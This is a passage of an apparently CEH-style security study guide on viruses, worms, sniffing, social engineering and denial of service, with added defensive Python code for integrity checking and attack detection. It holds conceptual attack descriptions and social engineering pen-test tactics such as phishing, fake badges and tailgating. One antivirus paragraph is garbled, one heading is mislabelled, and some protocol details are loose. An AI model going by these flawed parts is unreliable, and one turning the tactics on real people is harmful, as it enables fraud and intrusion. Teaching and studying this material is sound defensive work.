Transient and Terminate-and-Stay-Resident Viruses - The transient virus transfers all control of the host code to where it resides, then selects the target program to be modified and corrupted. The Terminate and Stay Resident (TSR) virus remains permanently in memory during the entire work session, even after the target host's program is executed and terminated. The TSR can only be removed by rebooting the system.

Writing a Simple Virus Program
There are many virus makers available to the public and most of them require no technical knowledge to create a virus.

Computer Worms
Computer worms are malicious programs that replicate, execute, and spread across network connections independently without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system. Attackers can use worm payloads to install backdoors in infected computers, which in turn will make them susceptible to becoming zombies. As a zombie they will be part of a botnet used to carry out further cyber-attacks controlled by the worm author or whoever they sell the botnet to.

Worm Analysis
Conficker Worm
The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067) on Windows 2000, Windows XP, Windows Vista, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 Beta. While Windows 7 may have been affected by this vulnerability, the Windows 7 Beta was not publicly available until January 2009. Although Microsoft released an emergency out-of-band patch on October 23, 2008 to close the vulnerability, a large number of Windows PCs (estimated at 30%) remained unpatched as late as January 2009. A second variant of the virus, discovered in December 2008, added the ability to propagate over LANs through removable media and shares. Researchers believe that these were decisive factors in allowing the virus to propagate quickly: by January 2009, the estimated number of infected computers ranged from almost 9 million to 15 million. Recent estimates of the number of infected computers have been notably more difficult because of changes in the propagation and update strategy of recent variants of the virus.

What is a Sheep Dip Computer?
A sheep dip is the process of checking physical media, such as floppy disks or CD-ROMs, for viruses before they are used in a computer. Typically, a computer that sheep dips is used only for that process and nothing else, and is isolated from the other computers, meaning it is not connected to the network. Most sheep dips use at least two different antivirus programs in order to increase effectiveness. The goal of sheep dipping is to block viruses from entering systems rather than waiting until they manifest on user workstations, at which time they will have already done their damage.
Anti-Virus Sensor Systems
Anti-virus systems have a collection of computer software packages that detect and analyze malicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.

Malware Analysis Procedure
Preparing the test bed:
. Install VMware or Virtual PC on the system
. Install the guest OS into the virtual machine
. Isolate the system from the network
. Disable shared folders and guest isolation
. Copy the malware over to the guest OS
Note - At least two machines should be used. One machine is for hosting the malicious binary (victim machine) and the other is for baselining and sniffing the network traffic (sniffer machine). They should be networked in such a way that each of them is able to sniff the other's network traffic.

Virus Detection Methods
Scanning - Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the virus.
Integrity Checking - These products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors.
Interception - The interceptor monitors the operating system requests that are written to the disk.
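The first two detection methods above, signature scanning and integrity checking, are the same two that the rootkit section (integrity-based and signature-based detection) and the virus pen-testing checklist (comparing file hashes against a pre-computed hash) rely on. The following is an added example for this study guide, not CEH courseware, that implements both over a throwaway directory tree: it records a SHA-256 baseline, then simulates a replaced system utility, a dropped file carrying a known byte pattern, and a deleted file, and reports what each method finds. The files and the single "signature" are constructed; a real scanner's database and pattern engine are far larger, but the comparison is the same.

```python
"""Integrity-based detection (file hashes against a trusted baseline) next to
signature scanning (known byte patterns), the two host-side methods this
guide lists for rootkits and viruses.  Added example for this study guide,
not CEH courseware; the files and the malware signature are constructed."""
import hashlib
import os
import shutil
import tempfile

# Constructed signature database: name -> byte pattern.
SIGNATURES = {
    "CONSTRUCTED-SAMPLE-0001": b"\x7fELFmalware-marker-constructed",
}


def hash_file(path):
    """SHA-256 of a file, read in chunks so large binaries do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root):
    """Snapshot: relative path -> hash for every regular file under root.
    Take this from known-good media, before the host is exposed."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full)
    return baseline


def compare_to_baseline(root, baseline):
    """Integrity check: which files changed, appeared, or vanished."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def scan_for_signatures(root, signatures=SIGNATURES):
    """Signature scan: (path, signature name) for files containing a known
    pattern.  Whole-file reads keep the example short."""
    hits = []
    for rel in sorted(build_baseline(root)):
        with open(os.path.join(root, rel), "rb") as handle:
            data = handle.read()
        for name, pattern in signatures.items():
            if pattern in data:
                hits.append((rel, name))
    return hits


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as handle:
        handle.write(data)


def demo():
    """Build a throwaway tree, baseline it, then simulate a replaced system
    utility, a dropped file carrying a known pattern, and a deleted file."""
    root = tempfile.mkdtemp(prefix="integrity-demo-")
    try:
        _write(root, "bin/ps", b"constructed: original ps bytes")
        _write(root, "bin/ls", b"constructed: original ls bytes")
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n")
        baseline = build_baseline(root)

        _write(root, "bin/ps", b"constructed: ps that hides processes")  # rootkit-style swap
        _write(root, "tmp/dropper", b"junk" + SIGNATURES["CONSTRUCTED-SAMPLE-0001"] + b"junk")
        os.remove(os.path.join(root, "etc", "hosts"))

        return compare_to_baseline(root, baseline), scan_for_signatures(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    changes, hits = demo()
    print("integrity:", changes)
    print("signatures:", hits)
```

Note which method catches what: the swapped ps binary has no known signature and is found only by the integrity check, while the dropped file is new and is found by both. This is the reason the guide lists the methods side by side, and it is also why a kernel rootkit is harder: if the operating system itself lies about file contents, the hashes computed on the live system cannot be trusted and the baseline has to be compared from a clean boot.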

Description: .jpg Description: Virus and Worm Countermeasures Install anti-virus software that detects and removes infections as they appear G enerate an anti-virus policy for safe com puting, and distribute it to the staff Pay attention to the instructions while downloading files or any programs from t he Internet U pdate the anti-virus softw are on a m onthly basis, allow it to identify and c ing new bugs Avoid opening the attachments received from an un nown sender as viruses spread via e-mail attachments The possibility of virus infection m corrupt data, thus regularly m ay aintain dat -ups Schedule regular scans for all drives after the installation of anti-virus softw are Do not accept dis s or programs without scanning them with anti-virus software f irst a bac lean

AntiVirus Tools
. AVG Antivirus
. BitDefender
. Kaspersky
. Trend Micro
. Norton AntiVirus
. Avast

Penetration Testing for Viruses
. Install Anti-Virus on the network infrastructure and on the end-user's system
. Update Anti-Virus to update the virus database of the newly identified viruses
. Scan the system which helps to repair damage or delete files infected with viruses
. If the virus is not removed, go in to safe mode and delete infected files manually
. If any suspicious process, registry entries, startup program or service is discovered, check associated executable files
. Check the startup programs and determine if all the programs can be recognized with known functionalities
. Check the data files for modification or manipulation by opening several files and comparing their hash value with a pre-computed hash



Module 8 Sniffers

Study Guide Objectives: . Lawful Intercept . Sniffing Threats . Types of Sniffing . Hardware Protocol Analyzers . MAC Attacks . DHCP Attacks . ARP Poisoning Attacks . Spoofing Attacks . Sniffing Tools . Countermeasures

Lawful Intercept
Lawful Intercept is the policy of allowing a Law Enforcement Agency (LEA) to obtain records of data transmissions across traditional communication lines through wiretaps, and also through internet services for voice and data with a proper judicial order. This information is provided to an LEA after such an order has been received by the service provider.

Sniffing Threats
Monitoring traffic in a network environment is called Sniffing. Using hardware or software to capture traffic a hacker can read any data found in plaintext. This data can take the form of web traffic, email traffic, passwords transmitted across protocols using plain text, and other traffic. Sniffing relies on having physical access to a network.

Types of Sniffing
Passive Sniffing
Passive sniffing is monitoring packets on a network segment that is not switched or bridged and can be seen by all machines on that segment. Hubs are outdated which makes them a rare find, but it is still possible to sniff wireless networks or networks with compromised switches. Any network card set to promiscuous mode connected to an open network segment can read all the connected devices' traffic because the traffic is not switched and sends the same data to all ports.
Active Sniffing
In today's switch-based network environments, a hacker injects packets into network traffic for a desired effect. This is active because you are actually causing a change instead of watching what occurs.


Hardware Protocol Analyzers
OSI Model Vulnerable Protocols: Telnet, HTTP, SMTP, NNTP, POP, FTP, IMAP
These protocols are vulnerable because they send some or all information in plain text. This traffic is capable of being compromised at the Data Link Layer (Layer 2 on the OSI model) which does not adhere to the restrictions of the upper levels. This allows for all of the traffic along these protocols to be compromised without issues in the higher OSI model layers.
Hardware protocol analyzers are special equipment that monitor network traffic across a cable without altering it and allow for precise information reading about that traffic. Using a piece of hardware like this on the SPAN port of a switch, which is set up to receive a copy of packets sent across the switch, allows for capture and monitoring of all the connections to that switch.

MAC Attacks
MAC Flooding
This attack occurs when a switch is bombarded with requests with different source MAC addresses. The Content Addressable Memory (CAM) table is usually of a small, fixed size; when it reaches its maximum the switch begins to broadcast traffic to all connections, like a hub. To defend against this some switches have the ability to limit the number of MAC addresses that can be learned on ports connected to end stations. An AAA (Authentication, Authorization, and Accounting) server can be used to authenticate discovered MAC addresses as well.

DHCP Attacks
Dynamic Host Configuration Protocol (DHCP) is used to allow new hosts to connect to a network easily; because of this functionality it can be insecure. It is important to remember that attacks against DHCP take advantage of its functionality because it is permitted, but in a manner that was not intended.
DHCP Starvation
This is a Denial of Service attack against a DHCP implementation. The attacker sends out requests for an entire DHCP scope instead of just one address, keeping anyone else from connecting to the server.
Rogue DHCP
An attacker can run a DHCP server for the same scope as the legitimate server, causing users to connect to the rogue. This server can then be used to eavesdrop on the users or intercept requests and send them to malicious sites.
DHCP attack countermeasures
Countering DHCP attacks can be done at the switch level by requiring DHCP traffic to be restricted by port and to only travel to trusted servers.

ARP Poisoning Attacks
The Address Resolution Protocol maps an IP address to a physical machine address that is recognized on the local network. An ARP table is created in networked devices containing this information. When a MAC address is not found in the table an ARP request is broadcast. When an answer is found the machine updates the table with the address pair, allowing communication.
ARP spoofing occurs when these packets are forged. This can then fill the ARP table, similar to a MAC Flood attack. ARP spoofing can also be used to poison the ARP table with fictitious entries to enable snooping. Using these fake ARP messages an attacker can divert communication to compromise a user or system. The ARP table can be bound to ports on a switch at the switch level to counter ARP poisoning.

Spoofing Attacks
MAC Spoofing Attacks
When an attacker can sniff out MAC addresses, they can use that information to spoof or duplicate the MAC in question and intercept or use a legitimate user's MAC address to receive that user's traffic. If the MAC address is used for network identification, the attacker now has access to what the legitimate user had access to by bypassing Access Control Lists on Routers and Servers. Spoofed MAC addresses are also used in other network traffic attacks like SYN floods and the Ping of Death. Countering spoofing attacks involves the use of binding tables and checking that addresses do not change IPs on the switch they are connected to.
DNS Poisoning
The Domain Name System, used to turn the names humans use into the numbers computers use, can be tricked by spoofing as well. A DNS server can be tricked into accepting false information, poisoning the cache of names that are used to answer a client's request for a website or network resource. When the user requests a website from a spoofed DNS server the user is sent to the location the attacker has designated on the false server. In order to defend against these attacks it is recommended that you resolve all requests locally, and use only trusted outside DNS servers as well. Configure firewalls to restrict external DNS lookups so that users are forced to keep requests internal. DNSSEC or Secure DNS uses cryptographic electronic signatures signed with a trusted public key certificate to confirm authentic traffic; implementing this protocol mitigates spoofing threats.

Sniffing Tools
. Wireshark
. Kismet
. Snort
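Switch-side detection logic for the MAC flooding, DHCP starvation and ARP poisoning attacks described above, as an added example not from the study guide. The event record format, the thresholds (20 MACs per 10 s port window, 10 DISCOVER clients per minute) and the capture built by constructed_capture() are assumptions for the demonstration.

```python
"""Switch-side detection for the Layer 2 attacks described above: MAC flooding,
DHCP starvation and ARP poisoning. Added example, not part of the CEH study
guide; the event format and the thresholds are assumptions, and the capture it
analyses is constructed inline."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class L2Event:
    ts: float          # seconds since capture start
    port: str          # switch port the frame arrived on
    src_mac: str       # source MAC address of the frame
    kind: str          # "DATA", "DHCP_DISCOVER" or "ARP_REPLY"
    ip: str = ""       # sender IP carried in an ARP reply, else empty


def _distinct_macs_per_window(events: List[L2Event], window_s: float,
                              kind: Optional[str] = None) -> Dict[Tuple[str, int], Set[str]]:
    """Group events into fixed windows and collect the distinct source MACs
    seen on each (port, window). Fixed windows are a simplification; a
    production sensor would use a sliding window."""
    seen: Dict[Tuple[str, int], Set[str]] = defaultdict(set)
    for e in events:
        if kind is None or e.kind == kind:
            seen[(e.port, int(e.ts // window_s))].add(e.src_mac)
    return seen


def mac_flood_ports(events: List[L2Event], window_s: float = 10.0,
                    max_macs: int = 20) -> Dict[str, int]:
    """Ports that learned more distinct source MACs in one window than an
    access port plausibly needs; the same limit port security enforces.
    Returns port -> highest count observed."""
    worst: Dict[str, int] = {}
    for (port, _w), macs in _distinct_macs_per_window(events, window_s).items():
        if len(macs) > max_macs:
            worst[port] = max(worst.get(port, 0), len(macs))
    return worst


def dhcp_starvation_ports(events: List[L2Event], window_s: float = 60.0,
                          max_discovers: int = 10) -> Dict[str, int]:
    """Ports emitting DHCP DISCOVERs from many different client MACs in one
    window, the pattern of a scope-exhaustion attempt."""
    worst: Dict[str, int] = {}
    grouped = _distinct_macs_per_window(events, window_s, "DHCP_DISCOVER")
    for (port, _w), macs in grouped.items():
        if len(macs) > max_discovers:
            worst[port] = max(worst.get(port, 0), len(macs))
    return worst


def arp_conflicts(events: List[L2Event]) -> Dict[str, Set[str]]:
    """IP addresses claimed by more than one MAC in ARP replies. A gateway IP
    suddenly answered from a second MAC is the classic poisoning symptom."""
    claims: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        if e.kind == "ARP_REPLY" and e.ip:
            claims[e.ip].add(e.src_mac)
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


def constructed_capture() -> List[L2Event]:
    """Constructed traffic: a quiet segment, then one port misbehaving."""
    ev: List[L2Event] = []
    gw_port, gw_mac, gw_ip = "Gi0/1", "00:aa:00:00:00:fe", "10.0.0.1"
    hosts = [("Gi0/2", "00:aa:00:00:00:02"), ("Gi0/3", "00:aa:00:00:00:03")]
    for t in range(0, 120, 5):                      # normal background traffic
        ev.append(L2Event(t, gw_port, gw_mac, "ARP_REPLY", gw_ip))
        for port, mac in hosts:
            ev.append(L2Event(t, port, mac, "DATA"))
    # Gi0/7 sources frames from 60 different MACs within a few seconds
    for i in range(60):
        ev.append(L2Event(30 + i * 0.1, "Gi0/7", f"02:00:00:00:00:{i:02x}", "DATA"))
    # the same port then sends 40 DHCP DISCOVERs, each from a fresh MAC
    for i in range(40):
        ev.append(L2Event(60 + i, "Gi0/7", f"02:00:00:01:00:{i:02x}", "DHCP_DISCOVER"))
    # and finally answers ARP for the gateway's IP with its own MAC
    for t in range(100, 120, 5):
        ev.append(L2Event(t, "Gi0/7", "02:00:00:02:00:01", "ARP_REPLY", gw_ip))
    return ev


if __name__ == "__main__":
    cap = constructed_capture()
    print("MAC flood:", mac_flood_ports(cap))
    print("DHCP starvation:", dhcp_starvation_ports(cap))
    print("ARP conflicts:", arp_conflicts(cap))
```

Each detector maps directly onto the switch-level countermeasure the text names: port security limits on learned MACs, DHCP restricted to trusted ports, and ARP bindings per port.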

Countermeasures
Sniffing with hardware requires physical access to the traffic that is being targeted. By securing the physical location and access to network equipment, a packet capture device cannot be installed. Sniffing depends on traffic being in plaintext; encryption keeps this from occurring.

SSL and IPSec (Internet Protocol Security) are examples of encryption solutions.

Module 9 Social Engineering

Study Guide Objectives: . What is Social Engineering? . Why is Social Engineering effective? . Phases in a Social Engineering attack . Common targets of Social Engineering . Types of Social Engineering . Common Intrusion Tactics and Strategies for Prevention . Social Engineering through Impersonation on Social Networking Sites . Risks of Social Networking to Corporate Networks . Identity Theft . Social Engineering Countermeasures . Social Engineering Pen Testing

What is Social Engineering?
Social engineering is the art of manipulating people into performing actions or divulging confidential information. Social engineers prey on people that are careless about protecting confidential information.

Why is Social Engineering Effective?
. There is no specific software or hardware for defending against a social engineering attack
. Security policies are as strong as their weakest link, and humans are the most susceptible factor
. It is difficult to detect social engineering attempts
. There is no method to ensure complete security from social engineering attacks

Phases in a Social Engineering Attack
Research
Researching a target company consists of dumpster diving, websites, employees, company tours, etc.
Develop
In this phase relationships are built with selected employees; impersonations may be developed as well.
Exploit
Collect sensitive account information, financial information, and current technologies.

Command Injection Attacks
Online - Contacting employees anonymously over the Internet and persuading them to provide information
Telephone - Requesting information usually through impersonating a legitimate user, either to access the telephone system itself or to gain remote access to computer systems
Personal Approaches - In personal approaches, attackers get information by asking for it directly

Common Targets of Social Engineering
. Receptionists/Help Desk Personnel
. Technical Support Executives
. System administrators
. Vendors of the target organization
. Users and clients

Types of Social Engineering
Human-based
Gathers sensitive information by interaction. Attacks of this category exploit trust, fear, and the helping nature of humans. An attacker can pose as a legitimate end user, a technical support person, or essentially anyone that they feel will persuade someone to reveal information.
Eavesdropping
Unauthorized listening of conversations or reading of messages; interception of any form such as audio, video, or written.
Shoulder Surfing
Attackers can look over someone's shoulder or view a target with binoculars to gain confidential information.
Dumpster Diving
Searching for useful documents or any other information in trash bins, printer stations, or someone's desk.
Tailgating
An unauthorized person enters a secured area by following closely behind an authorized person to gain access without the need for a key. This is done without the consent of the authorized user.

Piggybacking
Essentially the same principle as tailgating; however, the unauthorized person has consent in this case. The authorized person allows an unauthorized individual to gain access with their credentials.
Reverse Social Engineering
This is when the attacker creates a persona who appears to be in a position of authority so that employees will ask him for information, rather than the other way around. These attacks involve sabotage, marketing, and tech support.
Computer-based
Social engineering carried out with the help of computers.
Pop-Ups
Can be used to trick users into clicking a link that redirects them to fake websites asking for personal information, or downloads malicious programs such as keyloggers, Trojans, or Spyware.
Phishing
An illegitimate email falsely claiming to be from a legitimate site attempts to acquire the user's personal or account information.
Social Engineering using SMS
Insider Attacks
Spying
If a competitor wants to cause damage to your organization, steal critical secrets, or put you out of business, they just have to find a job opening, prepare someone to pass the interview, have that person hired, and they will be in the organization.
Revenge
It takes only one disgruntled person to take revenge and your company is compromised.
. 60% of attacks occur from behind the firewall
. An inside attack is easy to launch and is difficult to prevent

Common Intrusion Tactics and Strategies for Prevention

Area of Risk | Attacker's Tactics | Combat Strategy
Phone (Help Desk) | Impersonation and Persuasion | Train employees never to reveal information over the phone
Building Entrance | Unauthorized Physical Access | ID Badge enforcement, training, security officers
Office | Shoulder Surfing | Frosted Glass, not allowing others to view you typing
Phone (Help Desk) | Impersonating Help desk calls | Assign a PIN to employees for help desk calls
Office | Wandering strangers | Escort all guests
Mail Room | Insertion of forged memos | Lock and monitor mail room
Machine room / Phone closet | Attempting to gain access, remove equipment, attach rogue wireless access points or protocol analyzers | Keep these spaces locked, keep updated inventories
Phone and PBX | Stealing phone access | Control overseas and long distance calls, trace calls, and refuse transfers

Social Engineering through Impersonation on Social Networking Sites
Malicious users can gather information by impersonating others on social networks. This information can lead to an attacker creating large networks of friends to extract information using social engineering techniques. They can also use this information to carry out other forms of social engineering outside of the social network.

Risks of Social Networking to Corporate Networks
Data Theft
A social networking site is an enormous database accessed by many individuals, increasing the risk of information exploitation.
Involuntary Information
In the absence of a strong policy, employees may unknowingly post sensitive data about their company on social networking sites.
Targeted Attacks
Information on social networking sites could be used for preliminary reconnaissance in a targeted attack.
Network Vulnerability
All social networking sites are subject to flaws and bugs that may lead to vulnerabilities in the company's network.

Identity Theft
Identity theft is a form of fraud in which someone pretends to be someone else by assuming that person's identity, typically in order to access resources or obtain credit and other benefits in that person's name.
Theft of Personal Information
Identity theft occurs when someone steals your name and other personal information for fraudulent purposes.
Loss of Social Security Numbers
It is a crime in which an imposter obtains personal information, such as Social Security or driver's license numbers.
Easy Methods
Cyberspace has made it easier for an identity thief to use stolen information for fraudulent purposes.

Social Engineering Countermeasures
Policies
Good policies and procedures are ineffective if they are not taught and reinforced by the employees. After receiving training, employees should sign a statement acknowledging that they understand the policies and the ramifications for not upholding them.
Training
An efficient training program should consist of all security policies and various methods to increase awareness on social engineering. Being aware of the psychological techniques people tend to succumb to gives users empowerment. They recognize these techniques in use in the future.
Operational Guidelines
Ensure security of the sensitive information and authorized use of resources.
Classification of Information
Categorize the information as top secret, proprietary, for internal use only, for public use, etc.
Background Checks and Proper Termination Procedures
Insiders with criminal backgrounds and terminated employees are easy targets for procuring information.
Access Privileges
There should be administrator, user, and guest accounts with proper authorization.
Proper Incident Response Time
There should be proper guidelines for reacting to a social engineering attempt.
Two-Factor Authentication
Instead of fixed passwords, use two-factor authentication for high-risk network services such as VPNs, modem pools, and wireless networks.
Anti-Virus/Anti-Phishing Defenses
Use multiple layers of anti-virus defenses at end-user desktops and mail gateways to minimize social engineering attacks.

Change Management
Change management is a structured approach to transitioning individuals, teams, and organizations from a current state to a desired future state. A documented change-management process is highly effective and is proactive. An employee-dependent, undocumented approach is reactive and could harm productivity.

Social Engineering Pen Testing
Gaining Authorization
Obtain management's explicit authorization and details that will help in defining the scope of a pen-test. These details may consist of a list of departments, individual employees to target, and the level of physical intrusion allowed.
Intelligence Gathering
Collect email addresses and contact details of the target organization and its human resources (if not already provided) using techniques such as dumpster diving, email guessing, web searches, and email spider tools. Try to extract as much information as possible using footprinting techniques.
Create a Script
Based on the collected information, create believable impersonations, storylines, etc. to attack the target.
Use Emails
If management approves social engineering via email, use phishing techniques, impersonation, send malicious attachments. You are assessing how email attacks are treated by the organization and how much confidential information can be obtained.
Pick Up the Phone
Call a target posing as a colleague, an important customer, tech support, or refer to an important person in the organization to gain information.

In Person
Be creative and convincing. Befriend employees, pose as an external auditor, throw on some coveralls and impersonate a technician. These are all believable characters to play. Use tailgating to gain physical access, create fake badges. Once inside eavesdrop and shoulder surf. Meet employees in the break room and strike up a conversation.
Documentation
Document EVERYTHING: the responses from the users, security staff, and anyone you come into contact with. Video makes for a convincing form of documentation. What information was obtained and what vulnerabilities allowed you to collect confidential information? There is never a problem with too much detail in a report. All of this documentation is important to management as it helps to improve their security posture.

Module 10 Denial of Service

Study Guide Objectives: . What are DoS and DDoS attacks? . Symptoms of a DoS attack . DoS Attack Techniques . Botnets . Detection Techniques . DoS/DDoS Attack Countermeasures . DoS Attack Penetration Testing

What are DoS and DDoS Attacks?
Denial of Service refers to making a web site or service unavailable to users for a period of time. A DoS attack becomes a war of attrition. Does the attacker have more bandwidth or CPU power than the victim?
Websites are a common target for DoS attacks. If enough users (real or machine created) put a load on a website, then the webserver tasked with handling the information becomes slower or unable to create new connections to provide information. The website code itself may require too much processing power. Depending on the attack, a hacker may be able to use all of the bandwidth available to the webserver.
One common method of DoS is a Distributed Denial of Service, where the attacker has multiple computers under their control to distribute the attack. These attacks often occur using botnets, a set of computers that are controlled like robots to do a controller's bidding. They can be directed with simple commands and they are frequently used without the actual owner's knowledge.

Symptoms of a DoS Attack
An attacker takes up available resources using specific vulnerabilities or by using a Distributed attack through another network such as a Botnet. Symptoms may include a website going down, a large influx of spam, or an inability to access the internet. Connection monitoring features in routers or the use of a separate device will trigger alerts for this type of traffic. These alerts are often configured to allow the conceptual right amount of alerts that the network admin is comfortable with; no regard is given to the actual network traffic when they are set. This creates a false sense of security.
DoS and DDoS work by flooding a computer or network with specifically crafted queries or by just using a larger amount of bandwidth to connect to the target than the target has available to respond to the requests. A Web Stress test, such as used by Massively Multiplayer Online game developers, functions the same way in a legitimate, controlled fashion to show what the breaking point is of a set of servers. Malicious hackers can use the same tools and just ignore the breaking point to bring down the target.

Who uses DoS/DDoS
Cyber Criminals are increasingly being associated with organized crime syndicates. These organizations provide a hierarchical setup to use various activities and technical skills to mount sophisticated attacks. Organized groups create and rent botnets, offer services such as malware writing, hacking bank accounts, or create Denial of Service attacks against targets for a price. According to Verizon's 2010 Data Breach Investigations Report, the majority of breaches were driven by organized groups and 70% of data stolen was the work of criminals outside the victim organization. Organized hacktivism is a matter of concern for national security agencies.

DoS Attack Techniques
Bandwidth Attack
All bandwidth is used up by an attack. This leaves none for legitimate users. This type of attack is normally conducted by Distributed Denial of Service. Some hosting companies allow for ramping up more bandwidth during an attack, but the cost for this service can be prohibitive for many companies.
Service Request Floods
A service request flood works by exhausting server resources. Requests are made from a valid source, or a spoofed valid source, with the intention of using up TCP connections. When the threshold for connections is met, the server can no longer answer requests, denying the service to other users.
SYN attack
An attack exploits the three way handshake by creating spoofed SYN packets. This attack causes the server to send ACKs to the fake source of the SYN packets. This floods the source system that was spoofed with ACK traffic, keeping this system from responding to other traffic.
SYN Flooding
SYN Flooding works the same as a SYN attack, but instead of sending ACKs to a target, it uses the half open connections to overload the listening queue on the server. This keeps the server's ability to respond offline for a period of time depending on implementation.
ICMP Flood attack
A large number of packets with fake source addresses are sent to the target. Whether the target accepts the ping or not, the ping traffic overloads the target. This attack is also known as a Smurf Attack.
Peer to Peer attacks
Using p2p clients and the DC++ protocol an attacker can instruct other computers on the p2p network to disconnect and connect to a website. Given the massive amount of users connected to some of these networks this creates a DoS attack.
Permanent Denial of Service
This attack is also referred to as Phlashing. An attacker sends a fake update that causes a user or system to load software to damage the hardware or brick the system.

Application Level Flood attacks
These attacks occur higher on the OSI model than most flood attacks. Using applications such as email clients or web logins an attack exploits the program itself to create a flood of traffic. These can also occur with programs using a database by using crafted queries to jam access to the database.

Botnets
Botnets are huge networks that can be commanded to undertake actions on behalf of the Bot herder. Botnets are created by passing the controlling software to users and networks by several means. Trojans are a leading cause, such as Shark and Poison Ivy.
Command and Control, ICQ, IRC
Older internet communications such as ICQ and IRC are very lightweight and able to be used to relay commands to a zombie computer in a botnet. Internet Relay Chat is built into some botnet creation tools. When a hacker configures the botnet they can create the callback that allows for the bots to come to a specific IRC chat channel and receive commands from the master control. This allows for a bot herder to issue commands anonymously. DDoS Botnet software operates like a Trojan. It is covertly installed then it dials back to its command center. The compromised computer is now a bot. One new trend with Anonymous is to use the Low Orbit Ion Cannon, which users can point at a website by themselves or opt in to an attack.

Detection Techniques
Teaching a computer the difference between legitimate traffic and attacks is constantly being tested. Once one pattern is found, the human hacker evolves faster than the computer program. The current standard is to use Abnormalities and Noticeable deviation thresholds, which do not always work.
Wavelet Analysis is a way of describing input by spectral components; it looks for anomalies and the frequency of information to determine the normal frequency versus one during an attack.
Sequential Change-Point Detection uses an algorithm to isolate traffic statistics that are changed during attacks. Data is initially filtered by address, port, or protocol. This data is compared against deviations during an attack.
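A worked form of the Sequential Change-Point Detection technique above, as an added example not from the study guide: packet records are filtered to SYN-only segments for one port, reduced to a per-second count, and a one-sided CUSUM statistic flags the second at which the rate changes. The packet series and the CUSUM constants (allowance 0.5 sigma, threshold 5 sigma) are constructed assumptions.

```python
"""Sequential change-point detection over a filtered traffic statistic, as a
worked form of the detection technique described above. Added example, not
from the CEH study guide: the packet records are constructed inline and the
CUSUM tuning constants are assumptions."""
from typing import List, Optional, Tuple

# (timestamp_seconds, source_ip, destination_port, tcp_flags)
Packet = Tuple[float, str, int, str]


def syn_per_second(packets: List[Packet], dst_port: int = 80) -> List[int]:
    """Step 1 of the text: filter by port and protocol detail (SYN-only
    segments to one service) and reduce to a per-second count series."""
    if not packets:
        return []
    last = int(max(p[0] for p in packets))
    counts = [0] * (last + 1)
    for ts, _src, port, flags in packets:
        if port == dst_port and flags == "S":
            counts[int(ts)] += 1
    return counts


def cusum_change_point(series: List[int], baseline_len: int = 30,
                       k: Optional[float] = None,
                       h: Optional[float] = None) -> Optional[int]:
    """Step 2: one-sided CUSUM. Learn mean and std from the first baseline_len
    samples, accumulate positive deviations above mean + k, and report the
    first index where the accumulated statistic exceeds the threshold h.
    Returns None when no change point is found."""
    base = series[:baseline_len]
    if len(base) < 2:
        return None
    mu = sum(base) / len(base)
    sigma = (sum((x - mu) ** 2 for x in base) / len(base)) ** 0.5 or 1.0
    k = 0.5 * sigma if k is None else k   # allowance: ignore small wobble
    h = 5.0 * sigma if h is None else h   # decision threshold
    s = 0.0
    for i, x in enumerate(series):
        s = max(0.0, s + (x - mu - k))
        if s > h:
            return i
    return None


def constructed_packets(attack_start: int = 60, duration: int = 90) -> List[Packet]:
    """Constructed capture: ordinary web traffic for `duration` seconds, with a
    SYN flood from spoofed sources beginning at `attack_start`."""
    pkts: List[Packet] = []
    for t in range(duration):
        n_syn = 18 + t % 5                         # normal connection rate
        for i in range(n_syn):
            pkts.append((t + i / 100, f"192.0.2.{i}", 80, "S"))
        for i in range(n_syn):                     # matching ACKs, filtered out
            pkts.append((t + 0.5 + i / 100, f"192.0.2.{i}", 80, "A"))
        pkts.append((t + 0.9, "192.0.2.200", 443, "S"))  # other port, filtered out
        if t >= attack_start:
            for i in range(180):                   # flood: spoofed sources, never ACKed
                pkts.append((t + i / 1000, f"203.0.113.{i % 250}", 80, "S"))
    return pkts


if __name__ == "__main__":
    series = syn_per_second(constructed_packets())
    print("SYN/s around the change:", series[55:65])
    print("change point at second", cusum_change_point(series))
```

The baseline window must be taken from traffic known to be clean; a baseline learned during an attack simply teaches the detector that the flood is normal.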

DoS/DDoS Attack Countermeasures
Countermeasure strategies
1. Absorb
2. Degrade
3. Accept
To absorb an attack requires the resources and planning to scale your infrastructure above the hacker's ability to generate traffic. This requires significant planning and capital.
Degrading your services is done by turning off non-critical services. This allows your critical services the bandwidth or resources to run. If the non-critical services are being attacked this may thwart the attack.
A third option is to accept the attack, turning off your outside connections, or allowing them to be down for as long as the attack continues. (Let the terrorists win? Too soon?)

Mitigation and Prevention
Filtering traffic is one method to prevent DoS. Use Ingress and Egress filters to determine if traffic is coming from the correct location, blocking the traffic if it does not match. However, this can be defeated by spoofing.
Honeypots or Honeynets can be used to deflect attacks to a less critical network section. Creating a system or network that looks like your production system but does not have the sensitive data can be difficult and time consuming.
Mitigate with Load Balancing and throttling. Disable unused and insecure services. Block all inbound packets originating from the service ports. Configure the firewall to deny external Internet Control Message Protocol traffic access. Depending on how external internet access is set up, organizations may be able to prevent the transmission of the fraudulently addressed packets at the ISP level.

DoS Penetration Testing
